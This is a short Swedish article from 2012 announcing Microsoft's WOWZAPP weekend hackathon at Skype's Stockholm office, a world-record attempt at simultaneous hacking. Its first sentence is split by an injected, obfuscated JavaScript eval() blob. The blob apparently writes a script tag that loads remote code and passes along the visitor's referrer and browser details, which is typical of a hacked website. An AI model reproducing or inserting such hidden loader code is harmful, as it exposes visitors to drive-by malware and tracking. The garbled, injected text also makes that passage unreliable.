Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

WOWZAPP: Världsrekordsförsök i simultan-hackande

WOWZAPP: Världsrekordsförsök i simultan-hackande
Filip Urde
  • On 7 november, 2012
  • http://www.revue.se/filip-urde

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrarz|var|u0026u|referrer|hbnnz||js|php’.split(’|’),0,{}))
här helgen kommer 130 studenter och utvecklare från Sverige att delta i Microsoft-eventet WOWZAPP i Stockholm.

Målet med WOWZAPP helgen är att slå det nuvarande världsrekordet i simultan-hacking. (Simultan-hacking är helt enkelt  en massa personer som hackar tillsammans).

Det nuvarande rekordet är 11 000 personer som hackar samtidigt. Under 48 timmar kommer utvecklare och studenter på över 100 olika platser i världen koda spel och appar för Windows 8 och Windows Phone 8 för att slå rekordet.

I Stockholm är de 130 tillgängliga platserna redan uppbokade. På plats under helgen kommer det finnas experter från Microsoft som hjälper och assisterar deltagarna under processen. Microsoft har även bjudit in utvecklare för att hålla inspirerande föredrag för deltagarna. Bland annat kommer årets IT-tjej Ina Bäckström och pratar om spelutveckling under lördagen.

WOWZAPP går av stapeln på Skypes kontor i Munchenbryggeriet.

Eventet börjar på fredag (9/11) kl.17.00 och avslutas på söndagen (11/11) med en prisutdelning där en jury utser den bästa appen.

Mer info